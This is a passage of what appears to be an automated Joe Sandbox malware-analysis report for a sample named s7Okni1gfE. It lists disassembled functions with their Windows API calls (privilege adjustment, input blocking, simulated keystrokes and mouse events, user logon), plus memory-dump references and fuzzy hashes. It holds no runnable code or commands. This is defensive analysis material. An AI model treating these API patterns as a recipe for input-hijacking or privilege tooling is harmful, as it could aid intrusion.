                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                            • String ID:
                                            • API String ID: 1922334811-0
                                            • Opcode ID: 181d28f94fb97af7af17d7ee30ee22fa140eebe535462d6eb7bb1ee4ca72a2c6
                                            • Instruction ID: 326a47f6fc76a2462aadac8f2a7be0e0e709d320102d85856ca0e3f5cfb79f49
                                            • Opcode Fuzzy Hash: 181d28f94fb97af7af17d7ee30ee22fa140eebe535462d6eb7bb1ee4ca72a2c6
                                            • Instruction Fuzzy Hash: 1611BFB2400305AFE718AF58DC85D6BB7ADFF44310B20852EE15697241DB70FC418B60
                                            Function 00846685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008466AF
                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 008466EC
                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008466F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle
                                            • String ID:
                                            • API String ID: 33631002-0
                                            • Opcode ID: 0513f0bd6bf453f06a76f92403867b12b9edde97119deb45879049a6dbb74906
                                            • Instruction ID: b19f4e9eef5dfbb7b5bbefc024af222f2aad90fdfa72b1c517b3f399c2f941ec
                                            • Opcode Fuzzy Hash: 0513f0bd6bf453f06a76f92403867b12b9edde97119deb45879049a6dbb74906
                                            • Instruction Fuzzy Hash: 5D11A5B1900228BEE7109BACDC45FAFB7BCFB05718F004656F901E71D0E274AE0487A5
                                            Function 008471FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00847223
                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0084723A
                                            • FreeSid.ADVAPI32(?), ref: 0084724A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                            • String ID:
                                            • API String ID: 3429775523-0
                                            • Opcode ID: 8f23b2efbae1f3a2de360b23c2bd1864c145ec547b2ba8f1ff0a38a8e30f56c3
                                            • Instruction ID: 4851ef3f9e09600181fdc2330c18cd8e506365bfc02ecad32f414594d1640385
                                            • Opcode Fuzzy Hash: 8f23b2efbae1f3a2de360b23c2bd1864c145ec547b2ba8f1ff0a38a8e30f56c3
                                            • Instruction Fuzzy Hash: B9F01275904309BFDF04DFE8DD89AEEBBB8FF08201F504469A502E21D1E37066449B10
                                            Function 0084F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084F599
                                            • FindClose.KERNEL32(00000000), ref: 0084F5C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: d017bbb33915628788d93ae437b0063781057b9d3eb028ac3a5322ec51b2353b
                                            • Instruction ID: 14d5b88b8ef533eda2c61a19056a6b9a06d64be0bb1b69c0281aa388f109f3c8
                                            • Opcode Fuzzy Hash: d017bbb33915628788d93ae437b0063781057b9d3eb028ac3a5322ec51b2353b
                                            • Instruction Fuzzy Hash: 7911AD326002049FD700EF28D849A2EF3E9FF84324F01891EF9A9D7291DB34A9008B82
                                            Function 0084CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0085BE6A,?,?,00000000,?), ref: 0084CEA7
                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0085BE6A,?,?,00000000,?), ref: 0084CEB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            • String ID:
                                            • API String ID: 3479602957-0
                                            • Opcode ID: 4e4725cef8a6acaca83502e84546981830a13618400d98613b54d55e21f6c44d
                                            • Instruction ID: a462fd2a61d40f345d896632cfa3e123d84def9bba7f3d53f8556a0092abe006
                                            • Opcode Fuzzy Hash: 4e4725cef8a6acaca83502e84546981830a13618400d98613b54d55e21f6c44d
                                            • Instruction Fuzzy Hash: 55F08C3110032DABDB60EFA8DC49FEA776DFF083A1F008165F919D6181E730AA40CBA1
                                            Function 0084411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00844153
                                            • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00844166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InputSendkeybd_event
                                            • String ID:
                                            • API String ID: 3536248340-0
                                            • Opcode ID: bb890eec60148ccab29a6a1c992e3eea7646c1fb4aceacdcead8c555365175b1
                                            • Instruction ID: f1f222ff00c04b7570b3a59ba70eddd6d462aa6e1c5502ac4d836fe61ba307d9
                                            • Opcode Fuzzy Hash: bb890eec60148ccab29a6a1c992e3eea7646c1fb4aceacdcead8c555365175b1
                                            • Instruction Fuzzy Hash: 58F01D7090434DAFDB059FA4C805BBE7BB4FF04305F04841AF965D6192D77986169FA4
                                            Function 0083AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0083ACC0), ref: 0083AB99
                                            • CloseHandle.KERNEL32(?,?,0083ACC0), ref: 0083ABAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AdjustCloseHandlePrivilegesToken
                                            • String ID:
                                            • API String ID: 81990902-0
                                            • Opcode ID: ac4d5d6e41bce3dfc55405f881369def7b7bfef00f4f91033b3462cd32f3ddb4
                                            • Instruction ID: 6ba3a559b60f3e2b9f29268ebbdab7d2a8effc89ad8e547590714c9c78b2432b
                                            • Opcode Fuzzy Hash: ac4d5d6e41bce3dfc55405f881369def7b7bfef00f4f91033b3462cd32f3ddb4
                                            • Instruction Fuzzy Hash: C8E0BF72000A11AFE7252F59EC05DB6B7AEFF04320B108429B59AC1471D7625C90AB51
                                            Function 008281AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00826DB3,-0000031A,?,?,00000001), ref: 008281B1
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008281BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 0fba20823a2c47d85284659cc5c9418ad0704ff4cb06512f5faa19b930b9620f
                                            • Instruction ID: 36ae787b8ab63cb0877230461db31342365a9d090141586f74f0506e3fed8d66
                                            • Opcode Fuzzy Hash: 0fba20823a2c47d85284659cc5c9418ad0704ff4cb06512f5faa19b930b9620f
                                            • Instruction Fuzzy Hash: D8B09231044708ABDB002BA9EC09B587F68FB08656F008020F60D482A1AB7254108B92
                                            Function 008077B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 28a16c38f402d428f3c0895828ca441b8da9b99d473f05e24eb54c8c643f6a3c
                                            • Instruction ID: 89c797a5b224ddac21cf3092e1aa0aec5f02b5286d20d311c814c7ae5c678965
                                            • Opcode Fuzzy Hash: 28a16c38f402d428f3c0895828ca441b8da9b99d473f05e24eb54c8c643f6a3c
                                            • Instruction Fuzzy Hash: 58A23675E04219CFDB64CF58C8806ADBBB1FF48314F2581A9E859EB391D734AE81DB90
                                            Function 00813B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception
                                            • String ID: @
                                            • API String ID: 3728558374-2766056989
                                            • Opcode ID: da975ade62b7cbc441ba0f40b55f807f6407c7bc9b345121a504358b83d48a68
                                            • Instruction ID: e840cc4ece910dd092124f3b00f260228796485a0e2da31b5e08e35ddf4dcc64
                                            • Opcode Fuzzy Hash: da975ade62b7cbc441ba0f40b55f807f6407c7bc9b345121a504358b83d48a68
                                            • Instruction Fuzzy Hash: A3728E709042099FCF14DF98C881AEEB7B9FF48304F148059E91AEB295DB75EE85CB91
                                            Function 0082D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a91712fb8be5465cce554a4bb9223ca6a678659adef43c2e6c7e4af76017f36f
                                            • Instruction ID: 3982bdd861970a4e38fe8f0f066a76363be839226e38829f1e0518c4bbb872fe
                                            • Opcode Fuzzy Hash: a91712fb8be5465cce554a4bb9223ca6a678659adef43c2e6c7e4af76017f36f
                                            • Instruction Fuzzy Hash: 6E32F222D29F115DD723A634D822325AA88FFB73D4F15D737E819B5AAAEB29C4C34100
                                            Function 008096C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf
                                            • String ID:
                                            • API String ID: 674341424-0
                                            • Opcode ID: 609df9b4c4cf496caa6177e598ae48f6a0ff081ef84be91a53783d306e8274fc
                                            • Instruction ID: 973cd4b1e8ac106d54c165694ea05e822cd6bed457373080716d3eb3ac7e2549
                                            • Opcode Fuzzy Hash: 609df9b4c4cf496caa6177e598ae48f6a0ff081ef84be91a53783d306e8274fc
                                            • Instruction Fuzzy Hash: 752255716083119FD764DF18C891BAAB7E8FF84314F10892DF99AD7292DB71E944CB82
                                            Function 0083038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d468a3a7d15e06ff08c06b9501767968f65d27370c57d61b7f37212b943d8784
                                            • Instruction ID: 99e62555684ad99726526602e2f5d8ee98b318c3f64e463447c0ebdd33ab4794
                                            • Opcode Fuzzy Hash: d468a3a7d15e06ff08c06b9501767968f65d27370c57d61b7f37212b943d8784
                                            • Instruction Fuzzy Hash: 1EB1E220D2AF414DD723A6398831336B65CBFBB2D5F95D71BFC1A74D62EB2185934280
                                            Function 0084B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            • __time64.LIBCMT ref: 0084B6DF
                                              • Part of subcall function 0082344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0084BDC3,00000000,?,?,?,?,0084BF70,00000000,?), ref: 00823453
                                              • Part of subcall function 0082344A: __aulldiv.LIBCMT ref: 00823473
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Time$FileSystem__aulldiv__time64
                                            • String ID:
                                            • API String ID: 2893107130-0
                                            • Opcode ID: 04ccfade1dcfbe4bb11c704f487ac51917337132d63b4ce7217de10a8cfc458a
                                            • Instruction ID: e3805792c1da161c3c8534e5538642913fd4dec2940722729cc5f116fea9b0d8
                                            • Opcode Fuzzy Hash: 04ccfade1dcfbe4bb11c704f487ac51917337132d63b4ce7217de10a8cfc458a
                                            • Instruction Fuzzy Hash: 7B217F726345108BC72ACF38D891A92B7E5FB95310B248E6DE4E5CB2C0CB78BA05DB54
                                            Function 00856AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • BlockInput.USER32(00000001), ref: 00856ACA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BlockInput
                                            • String ID:
                                            • API String ID: 3456056419-0
                                            • Opcode ID: 39802fd8e04ad34e072d13c10fa193929a3907e95bfe587966bc1d1ee841c8b9
                                            • Instruction ID: 89cd955ca5abf6944563328fce3d38edc1162f4e0fe4ba01832e723efde4e2a2
                                            • Opcode Fuzzy Hash: 39802fd8e04ad34e072d13c10fa193929a3907e95bfe587966bc1d1ee841c8b9
                                            • Instruction Fuzzy Hash: 65E012352102146FD740EB9DD804996BBEDFF74751B04C416F945D7291DAB0F8548B91
                                            Function 008474BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008474DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: mouse_event
                                            • String ID:
                                            • API String ID: 2434400541-0
                                            • Opcode ID: a8d5c95f7b09c13307370f35174391e59012ecd50451454363915ee43ef18a82
                                            • Instruction ID: dcee6e3c2acd13af68f9313027a2b4948908e52eeccd5815ca07ff67a4cb8d71
                                            • Opcode Fuzzy Hash: a8d5c95f7b09c13307370f35174391e59012ecd50451454363915ee43ef18a82
                                            • Instruction Fuzzy Hash: 93D09EA556C70D79ED6907289C1FF761A08F3007C5F9495D9B582CA4C1BA905845913A
                                            Function 0083B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0083AD3E), ref: 0083B124
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LogonUser
                                            • String ID:
                                            • API String ID: 1244722697-0
                                            • Opcode ID: a75ccdcaf035c60d28d495b87b8c79eca7f7e8ef366b4d17b86bfbdfc0a6a405
                                            • Instruction ID: 5cf8d8a95fc11c4f692bc00ce9eaced4f5ee66d61a15531c55490810a1c24298
                                            • Opcode Fuzzy Hash: a75ccdcaf035c60d28d495b87b8c79eca7f7e8ef366b4d17b86bfbdfc0a6a405
                                            • Instruction Fuzzy Hash: 17D09E321A4A4EAEDF029FA4EC06EAE3F6AEB04701F548511FA15D50A1C675D531AB50
                                            Function 0087B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: 5cfb80401bf13c1d73a1164009541bc660f7c4cbe16a03e2568f8849c847db81
                                            • Instruction ID: 61526b0ad6074570db2cb71ee6877e4a8b3140fbf0cf19609d3fb0d45caa8bfd
                                            • Opcode Fuzzy Hash: 5cfb80401bf13c1d73a1164009541bc660f7c4cbe16a03e2568f8849c847db81
                                            • Instruction Fuzzy Hash: 0BC04CB140050DDFCB55DBC4C9449EEB7BCBB44305F1050919105F1150D7709B459B77
                                            Function 00828189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082818F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
